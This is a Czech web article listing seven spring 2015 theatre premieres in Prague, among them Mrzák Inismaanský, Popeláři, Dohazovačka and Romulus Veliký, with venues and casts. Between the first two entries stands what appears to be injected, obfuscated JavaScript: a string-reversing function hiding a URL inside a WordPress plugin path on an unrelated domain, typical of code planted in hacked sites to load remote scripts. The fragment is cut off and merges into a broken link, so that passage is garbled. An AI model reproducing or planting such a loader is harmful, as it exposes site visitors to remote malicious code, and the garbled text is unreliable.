FACESTARKulturaBŘEZEN, ZA KAMNA VLEZEM...ANI NÁHODOU! VYBERTE SI ZE 7 TIPŮ NA JARNÍ...

BŘEZEN, ZA KAMNA VLEZEM…ANI NÁHODOU! VYBERTE SI ZE 7 TIPŮ NA JARNÍ DIVADELNÍ PREMIÉRY!

Mrzák Inismaanský

Mrzák Inismaanský

Premiéra 6. března 2015, Divadlo v Celetné
Mrzák inishmaanský je prvním dílem druhé McDonaghovi trilogie, nazývané Aranská, která pokračuje Poručíkem z Inishmoru a nedokončenou hrou Smrtky z Inisheeru. Děj hry se točí okolo historicky doložené události, kdy v roce 1934 do Irska přijel americký režisér Robert J. Flaherty natáčet hraný dokument Muž z Aranu, který poté získal na Mezinárodním filmovém festivalu v Benátkách Mussiliniho pohár. „Takže Irsko asi nebude tak špatná zem, dyš se Amíkům chce do Irska jezdit filmovat!“ Právě příjezd filmařů až z Hollywoodu je zde hybatelem děje a jedinou zajímavou novinou za posledních dvacet let, která rozvíří jinak nudný život zdejších obyvatel.

and

 

$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandovodivadlo.cz/inscenace/293/popelari“>Popeláři

Premiéra 7. března 2015, Švandovo divadlo
Novinku s hudbou Romana Holého, člena skupiny Monkey Business a kapely J.A.R., režíruje Dodo Gombár. Ten společně s Romanem Sikorou napsal hru přímo pro smíchovskou scénu. Industriální mirákl vypráví o čisté lásce, o třídění odpadu, ale i o žánru jménem muzikál. A také o snu, který má asi každý malý kluk – protože snad každý malý kluk se touží alespoň na chvíli stát popelářem…Přání připojit se k mužům, kteří ještě nad ránem zbavují město smetí, má i jeden mladý muž v podání Tomáše Červinka. A právě on je na začátku celého příběhu přidělen k sehrané partě čtyř zkušených popelářů. Spolu s nimi poznává krásy své nové práce a na svět začne postupně nahlížet z docela jiného úhlu: a spatří obrázek stejně svérázný a magický, jako jsou i jeho čtyři kolegové…

Vím, že víš, že vím…

Premiéra 7. března 2015, Divadlo ABC
Na počátku je pouhý omyl. Soukromý detektiv si splete sledovanou osobu a místo manželky prominentního politika začne sledovat úplně obyčejnou rodinu. Co se skrývá pod pokličkou zdánlivě všedních dní všedního manželského páru středních let? Onen manželský pár si zahraje právě Simona Stašová, která si za svého hereckého partnera vybrala Michala Dlouhého.„Je to pravá tragikomedie. Je to bláznivý, ale hra má neuvěřitelnou hloubku,“ říká o inscenaci Simona Stašová. Diváci se mohou těšit na komedii plnou překvapení, zvratů, krásných lží, bouřlivých scén i italského humoru.

and

Dohazovačka

Premiéra 12. března 2015, Divadlo Na Fidlovačce
Americký dramatik a spisovatel Thornton Wilder zastával ideu „Je třeba milovat život, abychom jej mohli žít, a je třeba život žít, abychom jej mohli milovat“. Toto Wilderovo heslo i jeho osobní životní eskapády jistě pak souvisejí i s hrou Dohazovačka – vždyť právě dobrodružství jako taková jsou jejím ústředním tématem! Nejen titulní postava Dolly Leviová, ale i mnohé další postavy se rozhodnou, že po letech dřiny a odříkání si přeci mohou dovolit trochu si užívat. Nebojí se riskovat a vyrážejí dobrodružství vstříc. Jen tak mohou v životě objevit něco nového. V hlavních rolích Dolly Leviové a Horáce Vandelgeldera uvidíte Elišku Balzerovou a Zdeňka Maryšku.

Trampské soirée

Premiéra 14. března 2015, Divadlo Rokoko
Cyklus pravidelných divadelních setkání pod názvem Soirée je novinkou Městských divadel pražských letošní sezony. Jde o jakési večery pro radost a potěšení jak herců, tak diváků, ve kterých se umělci Městských divadel pražských představují v poněkud netradičních rolích. Nevystupují zde totiž v divadelních inscenacích a neprezentují pouze svůj činoherní talent, ale představují se jako zpěváci, muzikanti, tanečníci či recitátoři v komponovaných a mnohdy také improvizovaných pořadech. A často si zvou i zajímavé hosty, např. s Tomášem Novotným si zazpívala Eva Pilarová, s Veronikou Kubařovou Jiří Suchý a Jitka Molavcová, se Zbigniewem Kalinou a Janem Szymikem Renata Drössler. Tentokrát se vám představí Jitka Smutná a Hanuš Bor. Oba mají k tomuto tématu velmi blízko, a proto lze očekávat nejen písničky k ohni, ale také trampské historky. Jako speciální host vystoupí Wabi Daněk.

and

Happy End

Premiéra 28. března 2015, Divadlo Rokoko
Česká premiéra současné izraelské tragikomedie Happy End, ve které se lehce a s nadhledem vypráví o velmi vážných věcech. Režie se ujal Arnošt Goldflam, který tak vůbec poprvé uvede na česká jeviště hru dramatičky Anat Gov. V inscenaci uvidíte Danu Batulkovou, Radku Fidlerovou, Jitku Smutnou, Evellyn Pacolákovou, Hanu Doulovou, Jiřího Hánu a další. Anat Gov patřila k předním izraelským dramatikům posledních let. Happy End, který pro Divadlo Rokoko nastuduje Arnošt Goldflam, začala psát poté, co u ní lékaři objevili rakovinu. Rozhodla se o své chorobě hovořit naprosto otevřeně a tato tragikomedie je toho důkazem. I když se dotýká natolik závažných věcí, jakými jsou nemoc a smrt, nechybí jí humor a nadhled.

and

Romulus Veliký

Premiéra 23. května 2015, Divadlo ABC
Komedie Romulus Veliký patří k raným dílům Friedricha Dürrenmatta. Mistr absurdního divadla před nás staví antihrdinu, světapána, který se ke svým vladařským povinnostem chová velmi podivně a laxně. Místo, aby řešil ohrožení vlasti cizími vojsky, stará se o svůj chov slepic, a není tedy divu, že na něho doma číhá za každým závěsem nějaký ten vrah. Jsme svědky zániku říše, kterou spravuje šílenec, anebo se jedná o dobře promyšlenou státnickou hru? A pokud ano, jaký je její smysl a cíl? Jedna nečekaná situace střídá druhou až k šokujícímu odhalení. Přestože se příběh odehrává v době pádu Západořímské říše, postavy, situace a zápletky jsou ryze současné, velmi komické a velmi aktuální.

and

Související články